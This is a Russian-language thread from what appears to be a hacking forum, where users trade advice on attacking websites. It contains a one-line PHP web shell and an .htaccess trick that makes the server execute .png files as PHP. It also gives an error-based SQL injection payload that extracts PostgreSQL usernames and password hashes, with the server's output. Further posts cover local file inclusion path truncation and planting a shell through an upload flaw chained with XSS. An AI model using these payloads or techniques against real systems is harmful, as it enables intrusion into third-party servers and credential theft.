Впринципе ты прав, но нужно чтоб сервер выполнял .png как php =) Это возможно только неправильной(злонамеренной) настройке сервера, например можешь создать такой файл: .htaccess Code: AddType application/x-httpd-php .png Но просто так код в картинке выполняться не будет. P.S. И у тебя код какой-то неправильный <?php system($GET['cm']);?>
Да, скорее всего не сможешь. Но тут ничего не поделать, если бы в 2013 году во всех .png картинках исполнялся код наш мир не был бы таким каким мы его знаем.
Всё зависит от настроек сервера и кода скрипта. Можешь например тут почитать: https://rdot.org/forum/showpost.php?p=1142&postcount=5 P.S. По мотивам оригинального вопроса вспомнился этот пост: http://forum.antichat.ru/showpost.php?p=1473083&postcount=13 Пожалуйста
Два раза подряд нахожу SQL inj в PostgreSQL И никак не пойму почему при таком запросе: '+and+1=cast((SELECT+usename||chr(58)||passwd+FROM+pg_user+LIMIT+1+OFFSET+1)+as+int)-- выдает: Warning: ERROR: invalid input syntax for integer: "xxx3:********" query: select src from url_alias where dst='firms' and 1=cast((SELECT usename||chr(58)||passwd FROM pg_user LIMIT 1 OFFSET 1) as int)--' in /web/XXX/www/includes/database.pgsql.inc on line 160 пароль под звездочками...! Что не так? П.с.g_shadow - доступа нет. брал аналогию запроса: '+and+1=cast((SELECT+usename||chr(58)||passwd+FROM+pg_shadow+LIMIT+1+OFFSET+1)+as+int)-- Query failed: ERROR: invalid input syntax for integer: "pg_database" in /web/XXX/www/includes/database.pgsql.inc on line 139
Потому что в pg_user не хранится пасс(http://www.postgresql.org/docs/8.3/static/view-pg-user.html), ну а на pg_shadow нужны рутовые права(к слову).
Помогите решить такую ситуацию. - есть локалинклуд по типу PHP: <?php include("/var/www/vhosts/site.com/application/includes/public/ajax_scripts/".$_GET['page'].".php");?> - ядовитый ноль экранируется Прочитал про усечение пути до MAX_PATH. Пробывал руками, но как-то не вышло, есть ли софт(скрипт) для автоматизации этого процесса??? Заранее спасибо за ответы.
Не сталкивался с таким скриптом(хотя написать его несложно). Поскольку я не знаю что ты читал про MAX_PATH, привожу пост (https://rdot.org/forum/showpost.php?p=6942&postcount=25)где это описано максимально подробно. В частности автор пишет: И еще там требования к версии php < 5.3.* Так что если путь вправду начинается со /(как в приведённом тобой коде), то этой техникой ты ничего не добьёшься. Пожалуйста =)
Ситуация следующая. Имеется сайт на основе Zend Framework (Узнать версию пока не смог). В одном из разделов реализован upload файлов (картинок) без полноценной проверки, то есть закачать можно картинку с любым содержанием и если на создании миниатюры не произошло ошибки, то оригинал переименовывается и виден в папке загрузки, не исполняется. (Обойти это пока не получилось, так как при попытке залить php при обработки закачиваемого файла система сыпется наполовину (ломается дизайн) и закачиваемый файл не сохраняется. Плюс ко всему есть дырявый TyneMCE с XSS уязвимостью Подскажите возможно ли имея весь этот букет, а может и больше "завладеть" видом на файловую систему
В теории, если есть уже известный вариант, заливки шелла через админку, к примеру через какой либо момент правки файла, то через xss можно передать данные в форму сохранения файла, но это должен сделать авторизованый админ, на практике, все зависит от случия.